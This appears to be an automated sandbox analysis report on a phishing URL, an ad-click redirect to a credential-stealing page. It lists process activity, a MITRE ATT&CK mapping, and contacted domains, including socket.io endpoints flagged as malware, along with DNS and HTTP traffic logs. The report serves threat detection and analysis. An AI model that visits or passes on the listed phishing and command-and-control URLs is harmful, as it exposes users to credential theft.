WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1856,i,6406461153293948782,16482880529219754941,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1856,i,6406461153293948782,16482880529219754941,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	3 Masquerading	OS Credential Dumping	1 System Information Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Web Protocols	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	0%	Avira URL Cloud	safe
https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Source	Detection	Scanner	Label
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8F2Sv&sid=NSMKkWgqL-vKTiOJABa9	100%	Avira URL Cloud	malware
https://carolyndc.com/m/jsnom.js	0%	Avira URL Cloud	safe
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8F2Su&sid=NSMKkWgqL-vKTiOJABa9	100%	Avira URL Cloud	malware
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8F1xk	100%	Avira URL Cloud	malware
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8El5Y	100%	Avira URL Cloud	malware
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8ElUm&sid=9ayRm2PCzdhJEleuABan	100%	Avira URL Cloud	malware
https://carolyndc.com/favicon.ico	0%	Avira URL Cloud	safe
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8ElUl&sid=9ayRm2PCzdhJEleuABan	100%	Avira URL Cloud	malware
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=websocket&sid=9ayRm2PCzdhJEleuABan	100%	Avira URL Cloud	malware
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8EqbU&sid=9ayRm2PCzdhJEleuABan	100%	Avira URL Cloud	malware
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=websocket&sid=NSMKkWgqL-vKTiOJABa9	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
sleeper-production.us-east-1.elasticbeanstalk.com	52.1.215.140	true	false	high
a.nel.cloudflare.com	35.190.80.1	true	false	high
d2vgu95hoyrpkh.cloudfront.net	18.245.187.34	true	false	high
cs837.wac.edgecastcdn.net	192.229.133.221	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
sni1gl.wpc.omegacdn.net	152.199.21.175	true	false	high
www.google.com	216.58.206.36	true	false	high
carolyndc.com	192.254.225.46	true	false	high
drensyoons1sedt.com	188.114.97.3	true	false	high
ad.broadstreetads.com	unknown	unknown	false	high
aadcdn.msftauth.net	unknown	unknown	false	high
www.w3schools.com	unknown	unknown	false	high
cdn.socket.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://a.nel.cloudflare.com/report/v4?s=cIjeTAWApHZJdqPyOcKenyKXhn4vtG5RhLBrVD8pAQrx93qQwYQXFuajfYMS9w89aiFekuDrO8QodgALhF%2FrQkV8XB%2B%2BlZ13CP3eyZS0JceixW%2BidrXCS%2B1uYqWfrzWxcNcyBHgz	false		high
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8F2Sv&sid=NSMKkWgqL-vKTiOJABa9	false	Avira URL Cloud: malware	unknown
https://carolyndc.com/m/jsnom.js	true	Avira URL Cloud: safe	unknown
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8El5Y	false	Avira URL Cloud: malware	unknown
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8F1xk	false	Avira URL Cloud: malware	unknown
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8F2Su&sid=NSMKkWgqL-vKTiOJABa9	false	Avira URL Cloud: malware	unknown
https://a.nel.cloudflare.com/report/v4?s=0A2lfSh%2BQ8X8z8Xipv0ZQi7mWsXFs6AdaEsSSVQ7gWit6KaPBYsOzMx8VzUTU6pw71HQ2V0H9Sabv9TcaRv6bx9DXD3EEROCqpwyCmKPH1z3DrwLYqmC6xoNpX%2FSscmS1g3vt%2Bxg	false		high
https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	true		unknown
https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg	false		high
https://a.nel.cloudflare.com/report/v4?s=qKgszsJxVbDElX9B5xc7RYPEUQCs0ZhMgNIzaMvSpMAM2pMQqsm9ZuRumCMjuNox5QX6urrQDX1DypLqp7Qx1PH%2FKeoxB8rzcR4CGtx0dXHRR%2FN%2BSkTMUeO2dhrbbU7AzeT4qWye	false		high
https://www.w3schools.com/w3css/4/w3.css	false		high
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8EqbU&sid=9ayRm2PCzdhJEleuABan	false	Avira URL Cloud: malware	unknown
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8ElUm&sid=9ayRm2PCzdhJEleuABan	false	Avira URL Cloud: malware	unknown
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=websocket&sid=9ayRm2PCzdhJEleuABan	false	Avira URL Cloud: malware	unknown
https://carolyndc.com/favicon.ico	true	Avira URL Cloud: safe	unknown
https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N	false		high
https://cdn.socket.io/4.7.5/socket.io.min.js	false		high
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PC8ElUl&sid=9ayRm2PCzdhJEleuABan	false	Avira URL Cloud: malware	unknown
https://drensyoons1sedt.com/socket.io/?EIO=4&transport=websocket&sid=NSMKkWgqL-vKTiOJABa9	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://cdn.socket.io/4.6.0/socket.io.min.js	chromecache_75.1.dr, chromecache_73.1.dr	false	high
https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc	chromecache_75.1.dr, chromecache_73.1.dr	false	high
https://google.com	chromecache_75.1.dr, chromecache_73.1.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.45	s-part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
192.254.225.46	carolyndc.com	United States	46606	UNIFIEDLAYER-AS-1US	false
18.245.31.78	unknown	United States	16509	AMAZON-02US	false
192.229.133.221	cs837.wac.edgecastcdn.net	United States	15133	EDGECASTUS	false
52.1.215.140	sleeper-production.us-east-1.elasticbeanstalk.com	United States	14618	AMAZON-AESUS	false
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
18.245.187.34	d2vgu95hoyrpkh.cloudfront.net	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	drensyoons1sedt.com	European Union	13335	CLOUDFLARENETUS	false
18.245.31.5	unknown	United States	16509	AMAZON-02US	false
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
152.199.21.175	sni1gl.wpc.omegacdn.net	United States	15133	EDGECASTUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1551556
Start date and time:	2024-11-07 21:04:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.win@18/40@28/14

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.206.67, 74.125.71.84, 172.217.18.14, 34.104.35.123, 142.250.184.227, 142.250.185.74, 142.250.186.42, 142.250.185.234, 142.250.186.170, 142.250.186.138, 142.250.185.138, 142.250.186.106, 172.217.18.10, 142.250.184.202, 142.250.74.202, 142.250.186.74, 142.250.185.170, 142.250.185.202, 172.217.16.138, 142.250.181.234, 172.217.16.202, 216.58.206.35, 142.250.185.110, 142.250.185.206, 142.250.186.163, 216.58.212.142
Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 7 19:04:37 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.978406216676029
Encrypted:	false
SSDEEP:	48:8qEdhTJhjwHMidAKZdA1FehwiZUklqehzxy+3:8qGPT2xy
MD5:	CD1E5E2375FF441F9ED6C50B610FD18E
SHA1:	0F9917996B6792157F2A1D8F21D060AD785D9A5B
SHA-256:	8471719A115A591D22024A5F9D275FE276B2A3F337597101DF3AAD373AB1C310
SHA-512:	F2A00EADE19D6D02EF441FDE28EFA7A7703687D3CD0FC27E2E9BF97BD917F2DB4429C0825350DCEF2F664BB1D2C0E7EB99C40EC2334711D5C266FCF899AC317A
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.......EP1..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$%-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 21:04:36.612509012 CET	53	59321	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:36.672993898 CET	53	62693	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:37.517529011 CET	63732	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:37.517745972 CET	50010	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:37.529402971 CET	53	63732	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:37.532970905 CET	53	50010	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:37.897514105 CET	53	64920	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:38.525845051 CET	56035	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:38.526041031 CET	63158	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:38.804258108 CET	53	63158	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:38.805953979 CET	53	56035	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:41.467227936 CET	55830	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:41.467374086 CET	64464	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:41.474175930 CET	53	55830	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:41.474196911 CET	53	64464	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:41.885250092 CET	52657	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:41.885652065 CET	52902	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:41.893347979 CET	53	52657	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:41.893361092 CET	53	52902	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:42.321302891 CET	62183	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:42.321441889 CET	53388	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:42.599663973 CET	53	53388	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:42.638842106 CET	53	62183	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:43.189928055 CET	51438	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:43.190088987 CET	62851	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:43.197792053 CET	53	62851	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:43.197833061 CET	53	51438	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:43.199610949 CET	63645	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:43.199740887 CET	59639	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:43.206973076 CET	53	59639	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:43.224668026 CET	53	63645	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:43.239612103 CET	56168	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:43.239758968 CET	56571	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:43.246980906 CET	53	56168	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:43.248112917 CET	53	56571	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:43.314587116 CET	53	51132	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:44.521680117 CET	60372	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:44.521816015 CET	63045	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:04:44.529069901 CET	53	60372	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:44.529791117 CET	53	63045	1.1.1.1	192.168.2.16
Nov 7, 2024 21:04:54.889908075 CET	53	55569	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:02.002655983 CET	53	53687	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:02.054876089 CET	50443	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:05:02.055013895 CET	53638	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:05:02.082819939 CET	53	50443	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:02.098016977 CET	53	53638	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:03.667671919 CET	64187	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:05:03.667834997 CET	62297	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:05:03.703250885 CET	53	62297	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:03.707262993 CET	53	64187	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:13.589231968 CET	53	57615	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:36.539206028 CET	53	51079	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:36.601824999 CET	53	54549	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:40.060065031 CET	55464	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:05:40.060302973 CET	53950	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:05:40.067379951 CET	53	55464	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:40.067645073 CET	53	53950	1.1.1.1	192.168.2.16
Nov 7, 2024 21:05:41.263866901 CET	138	138	192.168.2.16	192.168.2.255
Nov 7, 2024 21:06:05.787487030 CET	53	64908	1.1.1.1	192.168.2.16
Nov 7, 2024 21:06:24.402241945 CET	64301	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:06:24.407907009 CET	64174	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:06:24.410175085 CET	53	64301	1.1.1.1	192.168.2.16
Nov 7, 2024 21:06:24.416733027 CET	53	64174	1.1.1.1	192.168.2.16
Nov 7, 2024 21:06:40.065253973 CET	55546	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:06:40.065376043 CET	57657	53	192.168.2.16	1.1.1.1
Nov 7, 2024 21:06:40.072436094 CET	53	55546	1.1.1.1	192.168.2.16
Nov 7, 2024 21:06:40.072840929 CET	53	57657	1.1.1.1	192.168.2.16

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 7, 2024 21:04:43.273951054 CET	192.168.2.16	1.1.1.1	c2ea	(Port unreachable)	Destination Unreachable
Nov 7, 2024 21:05:02.098087072 CET	192.168.2.16	1.1.1.1	c289	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:38 UTC	807	OUT	GET /click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N HTTP/1.1 Host: ad.broadstreetads.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:38 UTC	1123	IN	HTTP/1.1 302 Found Date: Thu, 07 Nov 2024 20:04:38 GMT Transfer-Encoding: chunked Connection: close Set-Cookie: streetsign1=53e9cj00c0000000000000000000000000000000000000000000000000000000; path=/; expires=Fri, 08 Nov 2024 20:04:38 GMT; domain=.broadstreetads.com; samesite=none,streetcorner1=eyJpZCI6IjUzZTljajAwYzAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAiLCJpcCI6IjE3My4yNTQuMjUwLjc5IiwibGF0aXR1ZGUiOjMxLjAwNjUsImxvbmdpdHVkZSI6LTk3Ljg0MDYsInJlZ2lvbiI6IlRYIiwiY291bnRyeSI6IlVTIiwibWV0cm8iOjYyNSwiY2l0eSI6IktpbGxlZW4iLCJ6aXAiOiI3NjU0OSIsImlzcCI6Ik9NR2l0c2Zhc3QiLCJjcmVhdGVkX2F0IjoiMjAyNC0xMS0wN1QyMDowNDozOC40MzVaIiwidXBkYXRlZF9hdCI6IjIwMjQtMTEtMDdUMjA6MDQ6MzguNDM1WiJ9; path=/; expires=Fri, 08 Nov 2024 20:04:38 GMT; domain=.broadstreetads.com; samesite=none,streettag=808995-536057-64631-ad.broadstreetads.com-0-1731009878435; path=/; expires=Sat, 01 Mar 2025 20:04:38 GMT; domain=.broadstreetads.com; samesite=none; Secure x-hostname: ip-10-102-42-179.ec2.internal location: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N
2024-11-07 20:04:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
